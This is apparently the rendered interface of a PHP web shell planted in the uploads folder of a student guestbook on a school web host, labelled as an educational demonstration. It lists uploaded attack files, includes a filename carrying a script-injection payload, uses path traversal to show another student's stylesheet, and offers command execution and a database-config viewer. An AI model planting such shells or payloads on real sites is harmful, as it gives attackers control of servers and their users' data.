🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../584838.klas4s23.mid-ica.nl/public_html/Style1.css

.header{
  background-color: rgba(0, 0, 0, 0.366);
  -webkit-text-fill-color: #f4f4f4;
  padding: 5px;
  text-align: center;
  position: fixed;
  top: 0;
  width: 100%;

}

body {
  margin: 0; 
  padding: 0;
  font-family: Arial, Helvetica, sans-serif;
  overflow-x: hidden;
}

a {
  text-decoration: none;
  color: #232323;
  transition: color 0.3s ease;
}

.center { 
  display: flex;
  align-items: center;
  justify-content: center;
  position: absolute;
  margin: auto;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  border-radius: 3px;
}



.btn {
  display: inline-block;
  padding: 10px 20px;
  margin: 10px;
  text-decoration: none;
  color: #fff;
  background-color: #071a2e59;
  border: 1px solid #29558559;
  border-radius: 5px;
  transition: background-color 0.3s ease, border-color 0.3s ease, color 0.3s ease;
}




.topnav a {
  float: left;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}

.topnav a:hover {
  background-color: #ddd;
  color: black;
}

.topnav a.active {
  background-color: #04AA6D;
  color: white;
}

.main {
  margin-left: 160px; 
  padding: 0px 10px;
}


* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

/* Style for the social buttons container */
.social-container {
  position: fixed;
  bottom: 0;
  right: 0;
  margin: 30px; /* Adjust margin as needed */
  display: flex;
  flex-direction: column;
  align-items: flex-end;
}

/* Style for the individual buttons */
.social-buttons a {
  display: block; /* Buttons onder elkaar */
  text-decoration: none;
  border:1;
  color: #fff;
  font-weight: bold;
  padding: 23px 25px;
  border-radius: 5px;
  margin-bottom: 10px; /* Ruimte tussen de buttons toevoegen */
  background-repeat: no-repeat;
  background-position: left;
  background-size: contain;
}


/* Style for the Instagram button */
.instagram-btn {
  background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/e/e7/Instagram_logo_2016.svg/2048px-Instagram_logo_2016.svg.png');

}

/* Style for the LinkedIn button */
.linkedin-btn {
  background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/8/81/LinkedIn_icon.svg/2048px-LinkedIn_icon.svg.png');

}
html {
  height:100%;
}

body {
  margin:0;
}

html {
  height:100%;
}

body {
  margin:0;
}

.bg {
  animation:slide 3s ease-in-out infinite alternate;
  background-image: linear-gradient(-60deg, #6c3 50%, #09f 50%);
  bottom:0;
  left:-50%;
  opacity:.5;
  position:fixed;
  right:-50%;
  top:0;
  z-index:-1;
}

.bg2 {
  animation-direction:alternate-reverse;
  animation-duration:4s;
}

.bg3 {
  animation-duration:5s;
}

.content {
  background-color:rgba(255,255,255,.8);
  border-radius:.25em;
  box-shadow:0 0 .25em rgba(0,0,0,.25);
  box-sizing:border-box;
  left:50%;
  padding:10vmin;
  position:fixed;
  text-align:center;
  top:50%;
  transform:translate(-50%, -50%);
}

h1 {
  font-family:monospace;
}

@keyframes slide {
  0% {
    transform:translateX(-25%);
  }
  100% {
    transform:translateX(25%);
  }
}
.content {
  background-color:rgba(255,255,255,.8);
  border-radius:.25em;
  box-shadow:0 0 .25em rgba(0,0,0,.25);
  box-sizing:border-box;
  left:50%;
  padding:10vmin;
  position:fixed;
  text-align:center;
  top:50%;
  transform:translate(-50%, -50%);
}

h1 {
  font-family:monospace;
}


.vakje-container {
  display: grid;
  grid-template-columns: repeat(2, 1fr); /* Maakt twee kolommen */
  grid-gap: 20px; /* Ruimte tussen de vakjes */
}

.vakje-item {
  border: 2px solid black; /* Kader van 2 pixels breed met zwarte kleur */
  padding: 10px; /* Ruimte binnen het kader van 10 pixels */
}


  .vakje-item {
    margin-bottom: -10px; /* Voeg ruimte toe tussen de vakjes */
  }


  .kleine-afbeelding {
    width:  10px;
    height: auto; /* Behoudt de aspectverhouding */
  }

  .container {
    display: flex;
    flex-direction: column;
    align-items: center; /* Om ervoor te zorgen dat items in het midden worden uitgelijnd */
  }
  
  .container img {
    margin-top: 10px; /* Voeg wat ruimte toe tussen de afbeelding en de knop */
  }
  .vakje-item {
    display: flex;
    flex-direction: column;
    align-items: center; 
    
  }
  
.vakje-container {
  display: grid;
  grid-template-columns: repeat(2, 1fr); /* Maakt twee kolommen */
  grid-gap: 30px; /* Ruimte tussen de vakjes */
  margin-top: 60px; /* Plaats de vakjes 50 pixels onder de bovenkant */
}

  

  .container {
    display: flex;
    flex-direction: column;
    align-items: center;
  }
  .element {
    width: 50%;
  }
  img {
    max-width: 55%;
    height: auto;
  }
        
  
  .sidebar {
    width: 160px; /* Standaard breedte */
    position: fixed;
    z-index: 1;
    top: 0;
    left: 0;
    background-color: #111;
    overflow-x: hidden;
    padding-top: 16px;
  }
  
  .sidebar a {
    padding: 6px 8px 6px 16px;
    text-decoration: none;
    font-size: 20px;
    color: #818181;
    display: block;
  }
  
  .sidebar a:hover {
    color: #f1f1f1;
  }
  
  .sidebar {
    width: 160px; /* Standaard breedte */
    position: fixed;
    z-index: 1;
    top: 0;
    background-color: #111;
    overflow-x: hidden;
    padding-top: 16px;
  }
  
  .sidebar a {
    padding: 6px 8px 6px 16px;
    text-decoration: none;
    font-size: 20px;
    color: #818181;
    display: block;
  }
  
  .sidebar a:hover {
    color: #f1f1f1;
  }
  
  /* Responsive aanpassingen */
  @media screen and (max-width: 1000px) {
    .sidebar {
      width: 30%; /* Volledige breedte voor kleinere schermen */
      position: static; /* Geen vaste positie meer voor kleinere schermen */
      padding-top: 0; /* Geen bovenvulling meer voor kleinere schermen */
    }
  
    .sidebar a {
      padding: 1px 6px; /* Grotere padding voor gemakkelijkere aanraking op kleinere schermen */
      font-size: 15px; /* Kleinere lettergrootte voor kleinere schermen */
    }
  }
  /* Basisstijl voor .vakje-container en .vakje-item */


/* Responsieve aanpassingen */
@media (max-width: 768px) {
  .vakje-container {
    grid-template-columns: 1fr; /* EÊn kolom bij kleinere schermen */
  }
}

đŸŽ¯ Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

âŦ†ī¸ Parent directory | 🏠 Root directory | 🔍 View DB config
âš ī¸ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!